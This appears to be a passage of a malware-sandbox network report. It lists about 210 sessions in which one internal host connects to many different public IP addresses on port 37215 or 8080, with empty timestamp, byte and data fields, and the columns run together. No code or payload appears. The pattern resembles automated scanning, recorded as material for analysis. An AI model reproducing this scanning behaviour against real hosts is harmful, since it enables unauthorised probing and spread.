                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31057192.168.2.2340572157.206.149.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31058192.168.2.2347276161.254.139.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31059192.168.2.2333220157.69.43.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31060192.168.2.2340784197.56.209.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31061192.168.2.2343426197.160.43.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31062192.168.2.236059841.137.27.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31063192.168.2.236043441.135.55.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31064192.168.2.2340176188.35.96.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31065192.168.2.233723241.20.113.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31066192.168.2.2338080157.31.33.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31067192.168.2.2348842157.231.109.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31068192.168.2.2337576195.199.198.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31069192.168.2.2358316157.108.234.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31070192.168.2.2335678157.22.248.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31071192.168.2.234253041.252.133.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31072192.168.2.234596647.29.176.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31073192.168.2.2340652161.236.201.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31074192.168.2.2335788199.23.127.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31075192.168.2.2359832157.83.49.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31076192.168.2.2349926200.96.126.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31077192.168.2.2342522157.113.108.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31078192.168.2.2352116203.71.64.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31079192.168.2.2337494197.100.81.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31080192.168.2.2353748160.158.67.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31081192.168.2.2356952150.195.158.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31082192.168.2.2338304197.239.142.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31083192.168.2.234319840.250.240.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31084192.168.2.234787647.198.227.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31085192.168.2.2355726199.118.113.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31086192.168.2.2356790157.120.44.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31087192.168.2.233396641.96.183.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31088192.168.2.233957441.141.29.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31089192.168.2.2337668223.247.156.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31090192.168.2.233575251.79.35.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31091192.168.2.2348162157.238.175.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31092192.168.2.233457213.253.12.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31093192.168.2.235649035.222.129.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31094192.168.2.2338200165.51.151.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31095192.168.2.233585636.4.153.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31096192.168.2.2337126104.67.225.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31097192.168.2.2359092203.179.141.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31098192.168.2.234405852.72.0.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31099192.168.2.2338112212.171.22.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31100192.168.2.2357616206.67.42.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31101192.168.2.2351866110.231.111.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31102192.168.2.234835659.13.168.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31103192.168.2.2347598105.17.95.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31104192.168.2.2333152113.251.244.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31105192.168.2.235446493.75.202.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31106192.168.2.2350164141.113.34.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31107192.168.2.2344198149.88.167.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31108192.168.2.2343968111.72.117.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31109192.168.2.2343298178.88.101.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31110192.168.2.235316823.204.77.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31111192.168.2.2359200223.33.214.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31112192.168.2.2347636212.14.218.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31113192.168.2.2340610142.100.174.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31114192.168.2.2356914166.234.78.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31115192.168.2.234847479.243.58.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31116192.168.2.2357722176.37.71.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31117192.168.2.233461634.103.122.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31118192.168.2.2355998166.150.68.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31119192.168.2.234421838.95.50.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31120192.168.2.2336290126.21.7.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31121192.168.2.2354432124.88.113.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31122192.168.2.234218679.138.62.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31123192.168.2.2356098158.115.41.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31124192.168.2.2342260118.189.12.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31125192.168.2.23434509.21.174.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31126192.168.2.235194243.6.254.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31127192.168.2.2348370185.70.26.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31128192.168.2.235125885.51.156.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31129192.168.2.235102488.98.224.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31130192.168.2.2356390118.152.90.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31131192.168.2.2337560175.234.42.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31132192.168.2.235269490.29.183.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31133192.168.2.2354538156.223.201.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31134192.168.2.2334856143.58.181.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31135192.168.2.2342916160.211.47.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31136192.168.2.2360938191.23.154.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31137192.168.2.235192617.103.150.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31138192.168.2.2352462147.25.93.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31139192.168.2.2360630141.96.176.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31140192.168.2.2342750140.253.168.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31141192.168.2.2360140106.134.172.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31142192.168.2.2354260106.55.179.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31143192.168.2.2353484153.217.113.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31144192.168.2.2353430159.35.227.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31145192.168.2.234893086.39.106.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31146192.168.2.233541881.246.219.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31147192.168.2.234183467.5.212.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31148192.168.2.23523045.95.7.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31149192.168.2.23473045.63.147.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31150192.168.2.2350078114.53.33.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31151192.168.2.2337066149.65.98.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31152192.168.2.235889065.199.153.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31153192.168.2.2342792188.67.127.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31154192.168.2.2347696163.169.249.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31155192.168.2.2346822116.114.176.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31156192.168.2.2340086135.13.1.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31157192.168.2.233637468.131.116.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31158192.168.2.235808654.194.38.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31159192.168.2.2341460189.60.134.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31160192.168.2.233753299.156.67.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31161192.168.2.2334628124.95.65.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31162192.168.2.2339928138.252.114.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31163192.168.2.2355054159.104.176.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31164192.168.2.2360158146.209.117.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31165192.168.2.235839650.121.62.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31166192.168.2.2357392128.224.181.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31167192.168.2.2350976158.150.58.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31168192.168.2.2340342198.43.190.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31169192.168.2.2347618207.221.169.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31170192.168.2.235622694.211.143.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31171192.168.2.2346156201.33.184.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31172192.168.2.2341878139.3.248.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31173192.168.2.233710854.131.88.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31174192.168.2.234429899.140.204.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31175192.168.2.2347788156.219.161.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31176192.168.2.2351388112.129.113.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31177192.168.2.2342646151.44.45.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31178192.168.2.2335978150.23.160.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31179192.168.2.234444481.148.192.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31180192.168.2.235912883.113.171.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31181192.168.2.2339618104.80.111.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31182192.168.2.2356768145.30.171.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31183192.168.2.234898083.3.31.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31184192.168.2.2351946188.132.93.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31185192.168.2.2352466185.74.206.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31186192.168.2.2338280163.55.213.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31187192.168.2.2350310103.29.15.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31188192.168.2.2336568119.234.110.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31189192.168.2.234637058.156.175.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31190192.168.2.235879270.41.30.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31191192.168.2.23383485.198.3.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31192192.168.2.233425239.196.75.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31193192.168.2.2336700175.253.89.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31194192.168.2.2352220137.228.69.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31195192.168.2.235140462.243.186.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31196192.168.2.2338840204.168.159.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31197192.168.2.234396486.102.237.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31198192.168.2.2351750173.190.210.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31199192.168.2.2354758220.111.171.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31200192.168.2.233896847.46.98.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31201192.168.2.235036250.81.163.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31202192.168.2.233996265.246.38.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31203192.168.2.2341890122.19.78.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31204192.168.2.2357956210.121.101.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31205192.168.2.2334862163.235.211.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31206192.168.2.235861279.30.245.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31207192.168.2.235062276.180.242.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31208192.168.2.234200675.220.51.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31209192.168.2.2350130193.5.2.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31210192.168.2.2333362112.184.184.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31211192.168.2.234878096.65.93.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31212192.168.2.2342518204.73.115.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31213192.168.2.2357540211.32.111.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31214192.168.2.234235671.244.44.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31215192.168.2.2357412170.53.178.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31216192.168.2.233974849.198.115.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31217192.168.2.235997063.229.16.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31218192.168.2.2357210172.194.101.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31219192.168.2.236017476.211.23.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31220192.168.2.2357502183.47.154.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31221192.168.2.233908697.103.96.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31222192.168.2.2352892152.4.39.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31223192.168.2.2349676146.179.235.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31224192.168.2.2341768146.29.157.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31225192.168.2.234844840.7.182.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31226192.168.2.2340902208.219.91.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31227192.168.2.2347412220.110.32.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31228192.168.2.2351710144.26.74.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31229192.168.2.2347684200.165.235.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31230192.168.2.233664051.177.142.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31231192.168.2.234787092.66.51.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31232192.168.2.235173048.225.211.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31233192.168.2.235380865.234.57.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31234192.168.2.2359728125.141.78.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31235192.168.2.2355614186.153.178.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31236192.168.2.2344206132.103.224.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31237192.168.2.2353244123.130.235.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31238192.168.2.234248612.173.125.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31239192.168.2.234055070.250.182.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31240192.168.2.2349918181.29.196.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31241192.168.2.236046017.2.212.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31242192.168.2.2342932167.161.9.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31243192.168.2.2359038147.8.51.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31244192.168.2.235271095.75.189.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31245192.168.2.2356570147.248.77.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31246192.168.2.233349823.52.56.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31247192.168.2.2354896150.244.126.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31248192.168.2.2341002144.108.192.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31249192.168.2.2349678118.233.52.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31250192.168.2.2354114128.35.74.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31251192.168.2.2357808157.47.226.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31252192.168.2.2333732157.247.141.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31253192.168.2.234547041.92.87.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31254192.168.2.2358680190.4.164.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31255192.168.2.2338282197.129.193.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31256192.168.2.2335142157.60.50.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31257192.168.2.2339728142.99.251.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31258192.168.2.233809441.126.136.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31259192.168.2.2345818157.167.140.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31260192.168.2.2335932157.169.238.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31261192.168.2.2350548197.148.199.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31262192.168.2.234143241.52.176.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31263192.168.2.234281441.102.131.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31264192.168.2.2345030197.11.224.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31265192.168.2.2334380157.164.211.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31266192.168.2.2340288221.192.243.22737215
                                                        TimestampBytes transferredDirectionData


